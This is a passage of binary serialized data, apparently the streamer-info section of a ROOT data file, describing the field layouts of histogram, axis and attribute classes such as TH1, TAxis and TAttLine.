+U/Overflows\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00c\x80\x00\x03\xc7@\x00\x00[\x00\x02@\x00\x00U\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fXaxis\x11X axis descriptor\x00\x00\x00=\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05TAxis@\x00\x00c\x80\x00\x03\xc7@\x00\x00[\x00\x02@\x00\x00U\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fYaxis\x11Y axis descriptor\x00\x00\x00=\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05TAxis@\x00\x00c\x80\x00\x03\xc7@\x00\x00[\x00\x02@\x00\x00U\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fZaxis\x11Z axis descriptor\x00\x00\x00=\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05TAxis@\x00\x00{\x80\x00\x02\x08@\x00\x00s\x00\x02@\x00\x00m\x00\x04@\x00\x00=\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfBarOffset%(1000*offset) for bar charts or legos\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00y\x80\x00\x02\x08@\x00\x00q\x00\x02@\x00\x00k\x00\x04@\x00\x00;\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfBarWidth$(1000*width) for bar charts or 
legos\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00f\x80\x00\x02\x08@\x00\x00^\x00\x02@\x00\x00X\x00\x04@\x00\x00\'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fEntries\x11Number of entries\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00g\x80\x00\x02\x08@\x00\x00_\x00\x02@\x00\x00Y\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fTsumw\x14Total Sum of weights\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00s\x80\x00\x02\x08@\x00\x00k\x00\x02@\x00\x00e\x00\x04@\x00\x004\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumw2\x1fTotal Sum of squares of weights\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumwx\x15Total Sum of weight*X\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwx2\x17Total Sum of weight*X*X\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00o\x80\x00\x02\x08@\x00\x00g\x00\x02@\x00\x00a\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum\x1aMaximum value for plotting\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00o\x80\x00\x02\x08@\x00\x00g\x00\x02@\x00\x00a\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMinimum\x1aMinimum value for plotting\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfNormFactor\x14Normalization factor\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00u\x80\x00\x08\xbf@\x00\x00m\x00\x02@\x00\x00g\x00\x04@\x00\x005\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fContour\x1fArray to display contour levels\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00v\x80\x00\x08\xbf@\x00\x00n\x00\x02@\x00\x00h\x00\x04@\x00\x006\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fSumw2"Array of sum of squares of weights\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00f\x80\x00\x01?@\x00\x00^\x00\x02@\x00\x00X\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fOption\x11histogram 
options\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString@\x00\x00\x9c\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00}\x00\x02@\x00\x00w\x00\x04@\x00\x00F\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfFunctions.->Pointer to list of functions (fits and user)\x00\x00\x00?\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00a\x80\x00\x02\x08@\x00\x00Y\x00\x02@\x00\x00S\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfBufferSize\x0cfBuffer size\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x99\xff\xff\xff\xffTStreamerBasicPointer\x00@\x00\x00{\x00\x02@\x00\x00a\x00\x04@\x00\x00/\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fBuffer\x1a[fBufferSize] entry buffer\x00\x00\x000\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07double*\x00\x00\x00\x08\x0bfBufferSize\x03TH1@\x00\x00\x87\x80\x00\x02\x08@\x00\x00\x7f\x00\x02@\x00\x00y\x00\x04@\x00\x00=\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0efBinStatErrOpt!option for bin statistical errors\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11TH1::EBinErrorOpt@\x00\x00\x9c\x80\x00\x02\x08@\x00\x00\x94\x00\x02@\x00\x00\x8e\x00\x04@\x00\x00P\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0efStatOverflows4per object flag to use under/overflows in statistics\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13TH1::EStatOverflows\x00@\x00\x01\x82\x80\x00\x00[@\x00\x01z\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TNamed\x00\xdf\xb7J<\x00\x00\x00\x01@\x00\x01T\x80\x00\x00\x9b@\x00\x01L\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00d\x80\x00\x01?@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fName\x11object identifier\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString@\x00\x00`\x80\x00\x01?@\x00\x00X\x00\x02@\x00\x00R\x00\x04@\x00\x00 \x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fTitle\x0cobject title\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString\x00@\x00\x01y\x80\x00\x00[@\x00\x01q\x00\t@\x00\x00\x16\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x08TAttLine\x00\x94\x07EI\x00\x00\x00\x02@\x00\x01I\x80\x00\x00\x9b@\x00\x01A\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00`\x80\x00\x02\x08@\x00\x00X\x00\x02@\x00\x00R\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfLineColor\nLine 
color\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00`\x80\x00\x02\x08@\x00\x00X\x00\x02@\x00\x00R\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfLineStyle\nLine style\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00`\x80\x00\x02\x08@\x00\x00X\x00\x02@\x00\x00R\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfLineWidth\nLine width\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short\x00@\x00\x01\x1f\x80\x00\x00[@\x00\x01\x17\x00\t@\x00\x00\x16\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x08TAttFill\x00\xff\xd9*\x92\x00\x00\x00\x02@\x00\x00\xef\x80\x00\x00\x9b@\x00\x00\xe7\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00e\x80\x00\x02\x08@\x00\x00]\x00\x02@\x00\x00W\x00\x04@\x00\x00\'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfFillColor\x0fFill area color\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00e\x80\x00\x02\x08@\x00\x00]\x00\x02@\x00\x00W\x00\x04@\x00\x00\'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfFillStyle\x0fFill area style\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short\x00@\x00\x01\x85\x80\x00\x00[@\x00\x01}\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTAttMarker\x00)\x1d\x8b\xec\x00\x00\x00\x02@\x00\x01S\x80\x00\x00\x9b@\x00\x01K\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00d\x80\x00\x02\x08@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfMarkerColor\x0cMarker color\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00d\x80\x00\x02\x08@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfMarkerStyle\x0cMarker style\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00b\x80\x00\x02\x08@\x00\x00Z\x00\x02@\x00\x00T\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfMarkerSize\x0bMarker size\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float\x00@\x00\x00\xb3\x80\x00\x00[@\x00\x00\xab\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TArray\x00\x00p!\xb2\x00\x00\x00\x01@\x00\x00\x85\x80\x00\x00\x9b@\x00\x00}\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00d\x80\x00\x02\x08@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fN\x18Number of array 
elements\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int\x00@\x00\x06\t\x80\x00\x00[@\x00\x06\x01\x00\t@\x00\x00\x13\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x05TAxis\x00ZInp\x00\x00\x00\n@\x00\x05\xdc\x80\x00\x00\x9b@\x00\x05\xd4\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\r\x00\x00\x00\x00@\x00\x00\x7f\x80\x00\x00\xc6@\x00\x00w\x00\x03@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TNamed*The basis for a named object (name, title)\x00\x00\x00C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf\xb7J<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttAxis\x0fAxis attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\o\xff>\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x04@\x00\x00^\x80\x00\x02\x08@\x00\x00V\x00\x02@\x00\x00P\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fNbins\x0eNumber of bins\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00g\x80\x00\x02\x08@\x00\x00_\x00\x02@\x00\x00Y\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fXmin\x15low edge of first bin\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00h\x80\x00\x02\x08@\x00\x00`\x00\x02@\x00\x00Z\x00\x04@\x00\x00)\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fXmax\x16upper edge of last bin\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00h\x80\x00\x08\xbf@\x00\x00`\x00\x02@\x00\x00Z\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fXbins\x14Bin edges array in X\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00d\x80\x00\x02\x08@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fFirst\x14first bin to display\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00b\x80\x00\x02\x08@\x00\x00Z\x00\x02@\x00\x00T\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fLast\x13last bin to display\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00q\x80\x00\x02\x08@\x00\x00i\x00\x02@\x00\x00c\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fBits2\x16second bit status word\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0eunsigned short@\x00\x00\x88\x80\x00\x02\x08@\x00\x00\x80\x00\x02@\x00\x00z\x00\x04@\x00\x00K\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfTimeDisplay1on/off displaying time values instead of 
numerics\x00\x00\x00\x12\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04bool@\x00\x00\x80\x80\x00\x01?@\x00\x00x\x00\x02@\x00\x00r\x00\x04@\x00\x00@\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfTimeFormat\'Date&time format, ex: 09/12/99 12:34:00\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString@\x00\x00f\x80\x00\x16\xcb@\x00\x00^\x00\x02@\x00\x00X\x00\x04@\x00\x00#\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fLabels\x0eList of labels\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nTHashList*@\x00\x00l\x80\x00\x16\xcb@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fModLabs\x17List of modified labels\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*\x00@\x00\x05\x0e\x80\x00\x00[@\x00\x05\x06\x00\t@\x00\x00\x16\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x08TAttAxis\x00\\o\xff>\x00\x00\x00\x04@\x00\x04\xde\x80\x00\x00\x9b@\x00\x04\xd6\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00@\x00\x00\x80\x80\x00\x02\x08@\x00\x00x\x00\x02@\x00\x00r\x00\x04@\x00\x00D\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfNdivisions+Number of divisions(10000*n3 + 100*n2 + n1)\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00.\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfAxisColor\x16Color of the line axis\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00f\x80\x00\x02\x08@\x00\x00^\x00\x02@\x00\x00X\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfLabelColor\x0fColor of labels\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00e\x80\x00\x02\x08@\x00\x00]\x00\x02@\x00\x00W\x00\x04@\x00\x00\'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfLabelFont\x0fFont for labels\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00h\x80\x00\x02\x08@\x00\x00`\x00\x02@\x00\x00Z\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfLabelOffset\x10Offset of labels\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float@\x00\x00d\x80\x00\x02\x08@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfLabelSize\x0eSize of labels\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfTickLength\x14Length of tick 
marks\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00.\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfTitleOffset\x14Offset of axis title\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float@\x00\x00h\x80\x00\x02\x08@\x00\x00`\x00\x02@\x00\x00Z\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfTitleSize\x12Size of axis title\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float@\x00\x00j\x80\x00\x02\x08@\x00\x00b\x00\x02@\x00\x00\\\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfTitleColor\x13Color of axis title\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfTitleFont\x13Font for axis title\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short\x00@\x00\x00\xb8\x80\x00\x00[@\x00\x00\xb0\x00\t@\x00\x00\x17\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\tTHashList\x00\xcc~I\xc1\x00\x00\x00\x00@\x00\x00\x87\x80\x00\x00\x9b@\x00\x00\x7f\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05TList\x12Doubly linked 